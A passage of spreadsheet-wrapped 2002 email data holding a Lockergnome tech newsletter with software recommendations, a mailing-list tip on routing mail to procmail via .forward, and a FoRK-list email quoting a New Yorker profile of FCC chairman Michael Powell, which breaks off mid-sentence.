Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>www.neverfailgroup.com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www.neverfailgroup.com http://list.theregister.co.uk</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 10 Jul 2002 00:18:02 -0500</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 00:18:02 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Windows Daily]  Brilliant Mistakes</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![DDR\nMemory at Crucial.com]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.10.2002 GnomeREPORT  \n  \n---  \n  \n**WE NEED YOU TO BE AT GNOMEDEX!** That's what your employer should be telling\nyou. Microsoft Pocket PC experts will be sharing tips on improving workplace\nproductivity with portable devices. Combined with Proxim's on location\nwireless networking solutions, the Pocket PC can keep you and your co-workers\ncommunicating no matter where you are in the building. Learn how to bring Wi-\nFI and PDA technologies together for the ultimate in portable computing.\nRegister for Gnomedex today!  \n---  \n  \nLast week, Axialis Software released IconWorkshop v5.0 - arguably the most\npowerful icon editor / manager for the Windows platform. Ever the icon addict,\nI asked for your pixel-perfect creations. I have yet to receive one. Perhaps\nyou've been waiting for the right motivation? How about a nice little contest\ninvolving some of the most powerful sites on the Internet? Here's the deal:\nyou create five (or more) icons between now and the end of July 2002, upload\nthem to your [FREE] DeviantArt account (under Contests / Axialis Icon\nContest), and one of the five judges may pick it. The panel includes: myself,\nMattEO from DeviantArt, KarmaGirl from WinCustomize, Voodoo from Neowin, and\nMarc from Axialis. We'll each pick our favorite set. The winners will not only\nreceive one copy of IconWorkshop Corporate Edition, but some of their icons\nwill get bundled with a future version of the software! Ownership is retained\nby the original author, so don't hold back. Here's your chance at fame and\nfortune. Or, at least fame and free software.\n\nAh, the life of a software junkie! Pieter just released the new (unofficial)\nGoogle SearchTool today. It's much more convenient than the official toolbar\n(sorry, I just don't like browser add-ons). I also gave Cacheman another go; I\nhaven't used it since Windows 98. It's always been a great piece of shareware,\nbut I didn't realize it was THIS good. The speed increase has been quite\nnoticeable (even on Storm Shadow, my P4 2.5GHz machine). Outer Technologies is\nbrilliant. And so is Repligator 9.0. It gives me access to instant special\neffects - a one-stop shop for digital photo fun. I'm still debating whether or\nnot to install the latest Java runtimes. It seems to be unobtrusive on my test\nmachine, which is good to see; I don't want browser integration, I just wanna\nrun that awesome ASCII Art program. Oh, and "12 Mistakes Executives Make When\nPlanning Web Strategy" is available for FREE with the purchase of ANY\nGnomeTome (including our 50 freshly-released OS X tips). Go grab it if your\nboss doesn't know as much as s/he should.\n\nThere's a little bit of Oingo Boingo on Emusic now. They inked a deal with\nUniversal Music Group today - and I'm not paying any more to get access to\neven more MP3s. This is the ONLY way to go, and I hope and pray that more\nrecord labels will eventually catch on to the craze. The Internet is more than\na place for a pseudo-interactive pamphlet; the Internet fosters knowledge; the\nInternet is still in its infancy; the Internet has encouraged creativity and\ncommerce. The one thing the Internet is NOT: a fad. Its potential is\nlimitless, as long as it remains flexible and not controlled by any one\ncompany. This Palladium thing has got me more than a little spooked. It,\ncombined with the service-oriented OS, could very well be the thing that\ndrives people away from the Windows platform in droves (as much as I hate to\nadmit it). Software and music pirates unwittingly created DRM. I best not find\nout that you're part of the problem.\n\nSee You in August,  \nChris Pirillo  \n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n**Groone's Recipe Holder v1.1.0 [8.2M] W9x/2k/XP FREE**\n\n[URL]http://www.groonesworld.com[/URL]\n\n{Recipe lister} The best thing about this recipe holder? The conversion\ncalculator. I've always wondered how many teaspoons were in a gallon. There\nare a few delicious recipes already included, to help you start your\ncollection of favorites. Everything is nicely divided into categories, too.\nNeed a salad? Then click "Soups &amp; Salads." (Easy!) You can also make shopping\nlists. The printing capability is nice too, since I'm assuming most of you\ndon't keep your computer next to the stove. "If you have an up-to-date\ncomputer with Win2000, XP, or 98SE with the latest version of IE, then you can\ndownload the version with no runtime support since your computer has all the\nnecessary files."\n\n  \n**SolarInfo v1.0 [1.1M] FREE**\n\n[URL]http://www.sulaco.co.za[/URL]\n\n{Sun, moon, and planets} Why is it all the other planets have really cool\nnames for their respective moon(s), but Earth's is simply referred to as\n"moon?" We should change it to something catchier, like "Joey Joe-Joe Junior\nShabbadu." Don't mind me, I was just looking at this new application. It shows\na graphical representation of every planet in our solar system (as opposed to\nevery planet in the Hoth system) and its moons. It also provides detailed\ninformation such as the planet's distance from the sun, its volume, mass, and\ngravity in relation to Earth. What I found most interesting was how long a\nsingle "day" lasts on different planets. Did you know one day on Pluto is\nequal to six days on Earth? I guess he chased Chip and Dale around the\nChristmas tree for longer than we thought.\n\nRecommend It!\n\n  \n\n GnomeCLICKS  \n  \n---  \n  \n![TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL\nNOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special\nreports, and\nmore!]([URL]http://www.lockergnome.com[/URL] | ![The\neasiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring\nquick backup, batch processing, Windows integration and SUPPORTS 15 archive\nformats \(ACE, RAR, etc\).]([URL]http://www.picozip.com[/URL] |\n![Handy Backup]([URL]http://www.lockergnome.com[/URL] |\n![Secure your\nE-Mail!]([URL]http://www.lockergnome.com[/URL] |\n![Shortcut to\nRDesk.exe]([URL]http://www.capitalintellect.net[/URL] |\n![IPCheck Server Monitor monitors a network using various protocols \(e.g.\nping, http, smtp, ftp\) and notifies the staff in various ways as soon as an\noutage occurs.]([URL]http://www.lockergnome.com[/URL] |\n![Share your team/project contacts, calendars, tasks, etc. in MS Outlook 2002,\nwithout a\nserver!]([URL]http://www.lockergnome.com[/URL]  \n---|---|---|---|---|---|---  \n  \n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**TightVNC v1.2.4 [660k] W9x/2k/XP FREE**\n\n[URL]http://www.tightvnc.com[/URL]\n\n"VNC (an abbreviation for Virtual Network Computing) is a great client /\nserver software package allowing remote network access to graphical desktops.\nWith VNC, you may allow yourself to access your machine from everywhere\nprovided that your machine is connected to the Internet. VNC is free (released\nunder the GNU General Public License) and it's available on most platforms.\nThe original VNC distribution can be obtained at the AT&amp;T research labs site.\nHere you can find enhanced version of VNC, called TightVNC (grown from the VNC\nTight Encoder project), which is optimized to work over slow network\nconnections such as low-speed modem links. While original VNC may be very slow\nwhen your connection is not fast enough, with TightVNC you can work remotely\nalmost in real time in most environments. Besides bandwidth optimizations,\nTightVNC also includes many other improvements, optimizations and bug fixes\nover VNC."\n\nRecommend It!\n\n  \n\n GnomeWILDCARD  \n  \n---  \n  \n|  | **Full PDF Books**  \n---  \nPoor Richard's Web  \nInternet Promotions  \nE-Mail Publishing  \nWeb Site Makeover  \nWebsites Made Easy  \nOnline Communities  \nHome Networking  \nInternet Recruiting  \nOnline Branding  \n  \n**Pop-Up Menu Navigation Software**  \nScribbled by Pat Wong\n\n[URL]http://popup.jscentral.com[/URL]\n\nI found some really cool software to generate Web site navigation menus, and I\nthought you might be interested in learning about it. There are several\nexamples on the company's site, as well as on my own. Here's a small write-up\nabout it; perhaps you'd be interested in running this in a future Lockergnome\nissue? We've all seen a lot of really cool site navigation menus, with pop-up\ntext, neat mouseover effects, and the like. Most of them require a combination\nof HTML and JavaScript to build, which is expertise that goes way beyond some\nof us. At last, it's possible to easily generate just such a menu with some\nvery user-friendly screens to enter the data you want to use.\n\nPop-Up Menu comes in a freeware version, or you can get a fully licensed\nversion ($34.95 for a Home User license / $129.95 for the Web Designer\nlicense). The biggest difference? With the licensed version, you get the\nability to save a menu you've generated so you can modify it later. Your only\nalternative, if you want to make even a simple change to a menu generated by\nthe freeware version, is to create the whole menu again from scratch (or\ndiving into the nuts and bolts of the code and modifying that). Be forewarned:\nThe JavaScript reads like a novel, so modifying that could potentially be a\nnightmare. I decided to buy the fully licensed version and I'm really glad I\ndid. Sorry if I sound like a commercial for the company; I don't work for them\nor stand to be compensated in any way for recommending them. I just think this\nmenu system is the greatest thing to come along in a while.\n\nSubmit Your Thoughts | Recommend It!\n\n**Avoid intruders in your online space:** Our choice to protect your privacy!\nComplete browsing security. Clear cache, cookies, history and more with the\nclick of your mouse. Leave no telltale tracks behind!" Get a virtual Panic\nButton for your PC! Try it today!  \n---  \n  \n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**Calculator**  \nUnearthed by a Gnomie\n\n[URL]http://www.calculator.com[/URL]\n\n{Calculate it} Calculators aren't just for adding and subtracting numbers or\nspelling silly phrases by turning the calculator upside down. How about\nfiguring out the financing on your new car? What about the seeding rates for\nyour wheat farm? Perhaps you programmers out there need a nice HEX calculator.\nAnd, of course, what football fan wouldn't like to calculate the passing rates\nfor his or her favorite quarterback? If it seems like I'm all over the map\nhere, it's because this site provides links to all kinds of calculator sites\nfor all kinds of people. Trust me: it all adds up to a unique and useful site.\n\nRecommend It!\n\n  \n\n GnomeTIP  \n  \n---  \n  \n|  | **Our Tip eBooks**  \n---  \nMicrosoft Office Tips  \nPC Productivity Tips  \nCool Internet Tips  \nWindows 2000 Tips  \nWindows XP Tips  \nTop 50 Fun Sites  \nMust-Know Terms  \nTop 50 Useful Sites  \nTop 75 Tech Sites  \n  \nWho knows how to thwart false charges? Lockergnomie Steve Lafferty: "In a\nrecent article over the PayPal issue, it was stated that when using a credit\ncard illegally, the owner of that card is responsible for the first $50.\nHowever, sometging that very few people know about is that there is a US\nFederal provision in the banking industry called 'Reg E' (Regulation E /\nElectronic Funds Transfer). This stipulates that all transactions will err in\nfavor of the customer (account holder). This means that if your 'bank card' is\nused without your permission, you are not responsible for any of the charges.\nMy suggestion is never to use a credit card - and only use your bank debit\ncard. That way, if someone steals your number, you are not liable for any of\nthe charges." For more information, please refer to Section 205 on\nFEDERALRESERVE.GOV. Obviously, this tip only applies to people living in the\nUSA. If you haven't been watching your statements like a hawk lately, you'd be\nwise to start soon. Identity theft is a growing concern. When my wallet was\nstolen, I found IDENTITYTHEFT.ORG to be a godsend.\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Our Tip Files  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n Latest Audio Show  \n\n Low Price Search  \n $99 Tech Conference  \n\n![See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n The GnomeSTORE  \n Tell a Friend About Us!  \n Suggest a Feature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n General Feedback  \n E-mail the Editor  \n The Editor's Blog  \n\n\n\nMP3 SOFTWARE  \n  \n---  \n  \nHavas MP3 Pro  \nMagix MP3 Maker  \nEjay MP3  \nAudiostation 5.0  \nJack The MP3 Ripper  \nPearson MP3 Maker  \nSteinberg My MP3  \nMusicMatch Jukebox 7.0  \nHip Hop E-jay Record  \nMP3-Wolf  \nMP3 Maker Gold  \nThe MP3 Wizard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HAPPY FUN STUFF  \n  \n---  \n  \nAnd now, we see the story of the ugly shoe unfold before our very eyes. This\nfootwear was outcast from the group weeks ago, and has been very depressed\never since. Pity my shoe.\n\nThe Lone Shoe\n\n\n\n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.  Exercise extends your life by ten years, but you spend 15 of\nthem doing it.\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.qksrv.net http://www.groonesworld.com http://www.sulaco.co.za http://www.lockergnome.com http://www.picozip.com http://www.lockergnome.com http://www.lockergnome.com http://www.capitalintellect.net http://www.lockergnome.com http://www.lockergnome.com http://www.tightvnc.com http://popup.jscentral.com http://www.calculator.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Robert Waldner &lt;waldner@waldner.priv.at&gt;\nDate: Wed, 09 Oct 2002 21:24:57 +0200</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 21:24:57 +0200</t>
  </si>
  <si>
    <t>Re: From</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\nIt has been signed conforming to RFC3156.\nYou'll need GPG or PGP to check the signature.\n\n------------=_1034191516-429-0\nContent-Type: text/plain; charset=us-ascii\n\n\nOn Wed, 09 Oct 2002 14:43:32 EDT, Kevin Kenny writes:\n&gt;&gt; 3)  You can learn to use procmail,\n\n&gt;Can this be done via .forward?\n\nmake your .forward contain only the following line:\n"|/usr/bin/procmail"\n (incl. the quotes, your procmail binary may be in another path)\n\ncheers,\n&amp;rw\n-- \n-- For a list of points detailing how technology\n-- has failed to improve our lives, please press 3.                         \n\n\n\n------------=_1034191516-429-0\nContent-Type: application/pgp-signature; name="signature.ng"\nContent-Disposition: inline; filename="signature.ng"\nContent-Transfer-Encoding: 7bit\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.0 (GNU/Linux)\n\niD8DBQE9pIKcE0NzSJr53oIRArv6AJ0dnw3zse1X3xC/afguHB90HFC0qwCeIINr\nkuoZSln0mfGwGUgMRSprbgk=\n=1urd\n-----END PGP SIGNATURE-----\n\n------------=_1034191516-429-0--\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Wed, 09 Oct 2002 18:49:59 -0700</t>
  </si>
  <si>
    <t>Wed, 09 Oct 2002 18:49:59 -0700</t>
  </si>
  <si>
    <t>Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;</t>
  </si>
  <si>
    <t>Re: Lord of the Ringtones: Arbocks vs. Seelecks</t>
  </si>
  <si>
    <t>I got to see Powell talk in March 2001 at the beginning of his\nreign at the FCC.  He said they were going to take a real\nhands off approach, so it's funny that they would blame\nthe regulators for causing the collapse.  One thing he did\nget right, is that he wasn't worried that the US was behind\nEurope in the wireless licensing spectrum.  This is something\nvery prescient in that most of those licensors have had to\neat their lunch over the huge licensing costs they paid for\nvery little benefit.  His legacy was/is supposed to be\nrethinking the FCC's role to stay out of the way in this\nperiod of business innovation in the wireless space as he\ndidn't want the government forcing business models onto\nthe private sector.\n\nHis full transcript is here [1].  Interestingly enough I\ngot to see his speech in person as he was part of the whole\nCTIA'2001 Las Vegas keynote series of speakers.  Clay and\nI hoped a flight out of Ontario to Las Vegas to do demo support\nfor Craig Barrett [2].  His message was that there's no difference\nbetween wired and wireless Internet--it's all the same thing.\nInstead of scalable networks, we should be thinking about scalable\ncontent (&amp; using Magi he showed sending a blue man tv commercial\nfrom a desktop to a laptop to an ipaq to a color smartphone with\nthe content scaling back for each target platform).\n\nThe best part of the whole trip wasn't hobnobbing at all,\nbut really the fact that the Venetian had ran out of rooms.\nThey decided to put us up in one of their $10,000/night high\nroller rooms.  They put Clay in one and me in another.\nThe Venetian is known for having the largest hotel rooms\nanywhere, but these ones were bigger than my whole house. 8-)\n\nGreg\n\n\n[1] [URL]http://www.fcc.gov[/URL]\n[2] [URL]http://www.intel.com[/URL]\n\nRohit Khare wrote:\n&gt; I can't believe I actually read a laugh-out-loud funny profile of the \n&gt; *FCC Commissioner* fer crissakes! So the following article comes \n&gt; recommended, a fine explanation of Michael Powell's extraordinary \n&gt; equivocation.\n&gt; \n&gt; On the other hand, I can also agree with Werbach's Werblog entry... Rohit\n&gt; \n&gt;&gt; A Trip to F.C.C. World\n&gt;&gt;\n&gt;&gt; Nicholas Lemann has a piece in the New Yorker this week about FCC \n&gt;&gt; Chairman Michael Powell.  It's one of the first articles I've seen \n&gt;&gt; that captures some of Powell's real personality, and the way he's \n&gt;&gt; viewed in Washington.  Unfortunately, Lemann ends by endorsing \n&gt;&gt; conventional political wisdom.  After describing how Powell isn't \n&gt;&gt; really a fire-breathing ideological conservative, he concludes that, \n&gt;&gt; in essence, Powell favors the inumbent local Bell telephone companies, \n&gt;&gt; while a Democratic FCC would favor new entrants.  I know that's not \n&gt;&gt; how Powell sees the world, and though I disagree with him on many \n&gt;&gt; issues, I think he's right to resist the old dichotomy.\n&gt;&gt;\n&gt;&gt; The telecom collapse should be a humbling experience for anyone who \n&gt;&gt; went through it.  The disaster wasn't the regulators' fault, as some \n&gt;&gt; conservatives argue.  But something clearly went horribly wrong, and \n&gt;&gt; policy-makers should learn from that experience.  Contrary to Lemann's \n&gt;&gt; speculation, the upstart carriers won't be successful in a Gore \n&gt;&gt; administration, because it's too late.  Virtually all of them are \n&gt;&gt; dead, and Wall Street has turned off the capital tap for the \n&gt;&gt; foreseeable future.  Some may survive, but as small players rather \n&gt;&gt; than world-dominators. \n&gt;&gt;\n&gt;&gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is \n&gt;&gt; old news.  The next important battle in telecom will be between those \n&gt;&gt; who want to stay within the traditional boxes, and those who use \n&gt;&gt; different models entirely.  That's why open broadband networks and \n&gt;&gt; open spectrum are so important.  Whatever the regulatory environment, \n&gt;&gt; there is going to be consolidation in telecom.  Those left out in that \n&gt;&gt; consolidation will face increasing pressure to create new pipes into \n&gt;&gt; the home, or slowly die. The victors in the consolidation game will \n&gt;&gt; cut back on innovation and raise prices, which will create further \n&gt;&gt; pressure for alternatives. \n&gt;&gt;\n&gt;&gt; Lemann is right that policy-making looks much drier and more ambiguous \n&gt;&gt; on the ground than through the lens of history.  But he's wrong in \n&gt;&gt; thinking that telecom's future will be something like its past.\n&gt;&gt;\n&gt;&gt; Friday, October 04, 2002\n&gt;&gt; 11:17:11 AM  comments {0} \n&gt; \n&gt; \n&gt; ==============================================================\n&gt; [URL]http://www.newyorker.com[/URL]\n&gt; \n&gt; THE CHAIRMAN   \n&gt; by NICHOLAS LEMANN\n&gt; He's the other Powell, and no one is sure what he's up to.\n&gt; New Yorker, October 8, 2002\n&gt; \n&gt; Last year, my middle son, in eighth grade and encountering his first \n&gt; fairly serious American-history course, indignantly reported that the \n&gt; whole subject was incomprehensible. I was shocked. What about Gettysburg \n&gt; and the Declaration of Independence and the Selma-to-Montgomery march? \n&gt; Just look at my textbook, he said, and when I did I saw his point. His \n&gt; class had got up to the eighteen-forties. What I expected was a big \n&gt; beefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, \n&gt; there was some of that. But the main difference between my son's text \n&gt; and that of my own childhood was that somebody had made the disastrous \n&gt; decision to devote most of it to what had actually happened in American \n&gt; history. There were pages and pages on tariffs and bank charters and \n&gt; reciprocal trade agreements. I skipped ahead, past the Civil War, hoping \n&gt; for easier going, only to encounter currency floats and the regulation \n&gt; of freight rates. Only a few decades into the twentieth century did it \n&gt; become possible to see the federal government's main function as \n&gt; responding to dramatic crises and launching crusades for social justice, \n&gt; instead of attempting to referee competing claims from economic interests.\n&gt; \n&gt; Even now, if one were to reveal what really goes on behind the pretty \n&gt; speeches and the sanctimonious hearings in Washington, what you'd find \n&gt; is thousands of lawyers and lobbyists madly vying for advantage, not so \n&gt; much over the public as over each other: agribusiness versus real \n&gt; estate, banks versus insurance companies, and so on. The arena in which \n&gt; this competition mainly takes place is regulatory agencies and \n&gt; commissions and the congressional committees that supervise them. It's \n&gt; an insider's game, less because the players are secretive than because \n&gt; the public and the pressencouraged by the players, who speak in jargon\n&gt; can't get themselves interested.\n&gt; \n&gt; One corner of Washington might be called F.C.C. World, for the Federal \n&gt; Communications Commission. F.C.C. World has perhaps five thousand \n&gt; denizens. They work at the commission itself, at the House and Senate \n&gt; commerce committees, and at the Washington offices of the companies that \n&gt; the commission regulates. They read Communications Daily (subscription \n&gt; price: $3,695 a year), and every year around Christmastime they \n&gt; grumblingly attend the Chairman's Dinner, at a Washington hotel, where \n&gt; the high point of the evening is a scripted, supposedly self-deprecating \n&gt; comedy routine by the commission's chairman.\n&gt; \n&gt; Of all the federal agencies and commissions, the F.C.C. is the one that \n&gt; Americans ought to be most interested in; after all, it is involved with \n&gt; a business sector that accounts for about fifteen per cent of the \n&gt; American economy, as well as important aspects of daily lifetelephone \n&gt; and television and radio and newspapers and the Internet. And right now \n&gt; F.C.C. World is in, if not a crisis, at least a very soapy lather, \n&gt; because a good portion of what the angry public thinks of as the \n&gt; "corporate scandals" concerns the economic collapse of companies \n&gt; regulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, \n&gt; among others, are (or were) part of F.C.C. World. AOL Time Warner is \n&gt; part of F.C.C. World. Jack Grubman, the former Salomon Smith Barney \n&gt; analyst who seems to have succeeded Kenneth Lay, of Enron, as the \n&gt; embodiment of the corporate scandals, is part of F.C.C. World. In the \n&gt; past two years, companies belonging to F.C.C. World have lost trillions \n&gt; of dollars in stock-market valuation, and have collectively served as a \n&gt; dead weight pulling down the entire stock market.\n&gt; \n&gt; This year, an alarmed and acerbic anonymous memorandum about the state \n&gt; of the F.C.C. has been circulating widely within F.C.C. World. It evokes \n&gt; F.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") \n&gt; and suggests why nobody besides residents of F.C.C. World has thought of \n&gt; the commission in connection with the corporate scandals. The sentence I \n&gt; just quoted is followed by this explanation: "The ILECs appear likely to \n&gt; enter all l.d. markets within twelve months, while losing virtually no \n&gt; residential customers to attackers since 1996, and suffering about 10% \n&gt; market share loss in business lines to CLECs." It's a lot easier to \n&gt; think about evil C.E.O.s than to decipher that.\n&gt; \n&gt; \n&gt; Even in good times, F.C.C. World pays obsessive attention to the \n&gt; commission's chairman. In bad times, the attention becomes especially \n&gt; intense; and when the chairman is a celebrity F.C.C. World devotes \n&gt; itself to full-time chairman-watching. The current chairman, Michael \n&gt; Powell, is a celebrity, at least by government-official standards, \n&gt; because he is the only son of Colin Powell, the Secretary of State. \n&gt; Unlike his father, he has a kind of mesmerizing ambiguity, which \n&gt; generates enormous, and at times apoplectically toned, speculation about \n&gt; who he really is and what he's really up to. Powell is young to be the \n&gt; head of a federal agencyhe is thirty-nineand genially charming. \n&gt; Everybody likes him. Before becoming chairman, he was for three years \n&gt; one of the F.C.C.'s five commissioners; not only is he fluent in the \n&gt; F.C.C.'s incomprehensible patois, he has a Clintonesque love of the \n&gt; arcane details of communications policy. He's always saying that he's an \n&gt; "avid moderate." And yet he has a rage-inciting quality. One of his \n&gt; predecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell \n&gt; to Herbert Hoover. Mark Cooper, of the Consumer Federation of America, \n&gt; calls him "radical and extreme." Just as often as he's accused of being \n&gt; a right-wing ideologue, Powell gets accused of being paralytically \n&gt; cautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," \n&gt; another former chairman, William Kennard, says. "You have to have an \n&gt; answer." One day last spring, Powell, testifying before a Senate \n&gt; subcommittee, delivered an anodyne opening statement, and the \n&gt; subcommittee's chairman, Ernest Hollings, of South Carolina, berated \n&gt; him. "You don't care about these regulations," Hollings said. "You don't \n&gt; care about the law or what Congress sets down. . . . That's the \n&gt; fundamental. That's the misgiving I have of your administration over \n&gt; there. It just is amazing to me. You just pell-mell down the road and \n&gt; seem to not care at all. I think you'd be a wonderful executive \n&gt; vice-president of a chamber of commerce, but not a chairman of a \n&gt; regulatory commission at the government level. Are you happy in your job?"\n&gt; \n&gt; "Extremely," Powell said, with an amiable smile.\n&gt; \n&gt; \n&gt; One cannot understand Powell's maddening effect, at least on Democrats \n&gt; and liberal activists, without understanding not just the stated purpose \n&gt; of the commission he chairs but also its real purpose. The F.C.C. was \n&gt; created by Congress in 1934, but it existed in prototype well before the \n&gt; New Deal, because it performs a function that is one of the classic easy \n&gt; cases for government intervention in the private economy: making sure \n&gt; that broadcasters stick to their assigned spots on the airwaves. Its \n&gt; other original function was preventing American Telephone &amp; Telegraph, \n&gt; the national monopoly phone company, from treating its customers \n&gt; unfairly. Over the decades, as F.C.C. World grew up into a comfortable, \n&gt; well-established place, the F.C.C. segued into the role of industrial \n&gt; supervisionits real purpose. It was supposed to manage the competition \n&gt; among communications companies so that it didn't become too bloody, by \n&gt; artfully deciding who would be allowed to enter what line of business. \n&gt; In addition to looking out for the public's interest, the commission \n&gt; more specifically protected the interests of members of Congress, many \n&gt; of whom regard the media companies in their districts as the single most \n&gt; terrifying category of interest groupyou can cross the local bank \n&gt; president and live to tell the tale, but not the local broadcaster. \n&gt; According to an oft-told F.C.C. World anecdote, President Clinton once \n&gt; blocked an attempt to allow television stations to buy daily newspapers \n&gt; in the same city because, he said, if the so-and-so who owned the \n&gt; anti-Clinton Little Rock Democrat-Gazette had owned the leading TV \n&gt; station in Little Rock, too, Clinton would never have become President.\n&gt; \n&gt; \n&gt; F.C.C. World may have been con tentious, but it was settled, too, \n&gt; because all the reasonably powerful players had created secure economic \n&gt; niches for themselves. Then, in the nineteen-eighties, the successful \n&gt; breakup of A.T. &amp; T.by far the biggest and most important company the \n&gt; commission regulateddeposited a thick additional sediment of \n&gt; self-confidence onto the consciousness of F.C.C. World. A generation \n&gt; ago, for most Americans, there was one local phone company, one \n&gt; long-distance company, and one company that manufactured telephones, \n&gt; which customers were not permitted to ownand they were all the same \n&gt; company. It was illegal to plug any device into a phone line. By the \n&gt; mid-nineteen-nineties, there were a dozen economically viable local \n&gt; phone companies, a handful of national long-distance companies competing \n&gt; to offer customers the lowest price and best service, and stores \n&gt; everywhere selling telephone equipment from many manufacturersand \n&gt; millions of Americans had a fax machine and a modem operating over the \n&gt; telephone lines. A.T. &amp; T. had argued for years that it was a "natural \n&gt; monopoly," requiring protection from economic competition and total \n&gt; control over its lines. So much for that argument. Over the same period, \n&gt; the F.C.C. had assisted in the birth of cable television and cell phones \n&gt; and the Internet. It was the dream of federal-agency success come true: \n&gt; consumers vastly better served, and the industry much bigger and more \n&gt; prosperous, too.\n&gt; \n&gt; The next big step was supposed to be the Telecommunications Act of 1996, \n&gt; one of those massive, endlessly lobbied-over pieces of legislation which \n&gt; most people outside F.C.C. World probably felt it was safe to ignore. \n&gt; Although the Telecom Act sailed under the rhetorical banner of \n&gt; modernization and deregulation, its essence was a grand interest-group \n&gt; bargain, in which the local phone companies, known to headline writers \n&gt; as "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version \n&gt; of RBOCs, or regional Bell operating companies), would be permitted to \n&gt; offer long-distance service in exchange for letting the long-distance \n&gt; companies and smaller new phone companies use their lines to compete for \n&gt; customers. Consumers would win, because for the first time they would \n&gt; get the benefits of competition in local service while getting even more \n&gt; competition than they already had in long distance. But the politics and \n&gt; economics of the Telecom Act (which was shepherded through Congress by \n&gt; Vice-President Gore) were just as important. Democrats saw the act as \n&gt; helping to reposition them as the technology partythe party that \n&gt; brought the Internet into every home, created hundreds of thousands of \n&gt; jobs in new companies, and, not least, set off an investment boom whose \n&gt; beneficiaries might become the party's new contributor base. Clinton's \n&gt; slogans about the "information superhighway" and "building a bridge to \n&gt; the twenty-first century," which, like all Clinton slogans, artfully \n&gt; sent different messages to different constituencies, were the rhetorical \n&gt; correlates of the Telecom Act, and Gore's cruise to the Presidency was \n&gt; supposed to be powered substantially by the act's success.\n&gt; \n&gt; The F.C.C. had a crucial role in all this. The arbocks are rich, \n&gt; aggressive, politically powerful, and generally Republican (though like \n&gt; all important interest groups they work with both parties); they \n&gt; immediately filed lawsuits, which wound up tying the hands of their new \n&gt; competitors in the local phone market for more than three years. Through \n&gt; rule-making, enforcement, and litigation, the F.C.C., then headed by \n&gt; Reed Hundt, who was Gore's classmate at St. Albans, was supposed to keep \n&gt; the arbocks in their cages, so that not only long-distance companies \n&gt; like A.T. &amp; T. and MCI WorldCom but also a whole category of new \n&gt; companies, "see-lecks" (the pronounced version of CLECs, or competitive \n&gt; local exchange carriers), could emerge. This entailed the regulatory \n&gt; equivalent of hand-to-hand combat: the see-leck is supposed to have \n&gt; access to the arbock's switching equipment, the arbock won't give the \n&gt; seeleck a key to the room where it's kept, so the see-leck asks the \n&gt; F.C.C. to rule that the arbock has to give it the key.\n&gt; \n&gt; Partly because Hundt assured the see-lecks and other new companies that \n&gt; he would protect them, and partly because of the generally booming \n&gt; condition of the economy then, investment capital flooded into the \n&gt; see-leckscompanies with names like Winstar, Covad, and Teligentand \n&gt; into other telecommunications companies. Even not obviously related \n&gt; technology companies like Cisco Systems benefitted from the telecom \n&gt; boom: demand for their products was supposed to come from the see-lecks \n&gt; and other new players. There would be no conflict between the interests \n&gt; of the new telecom companies and those of consumers; as one of Hundt's \n&gt; former lieutenants told me, "Reed used to joke that my job was to make \n&gt; sure that all prices went down and all stocks went up."\n&gt; \n&gt; \n&gt; The years following the passage of the Telecom Act were the peak of the \n&gt; boom. Wall Street had its blood up, and that meant not just more \n&gt; startups but also more mergers of existing communications companies: \n&gt; Time Warner and AOL decided to throw in together, and A.T. &amp; T. and \n&gt; Comcast, and so on. (Surely, WorldCom and the other telecom bad guys \n&gt; believed that their self-dealing, stock-overselling, and creative \n&gt; accounting would go unnoticed because the market was so undiscriminating.)\n&gt; \n&gt; By the time the outcome of the 2000 Presidential election had been \n&gt; determined, the telecom crash was well under way. Nonetheless, the \n&gt; chairmanship of the F.C.C. remained one of the best jobs, in terms of \n&gt; influence and visibility, available to a career government regulator. \n&gt; Three Republicans emerged as candidates: Powell, who was a commissioner; \n&gt; Harold Furchtgott-Roth, the farthest-to-the-right commissioner; and \n&gt; 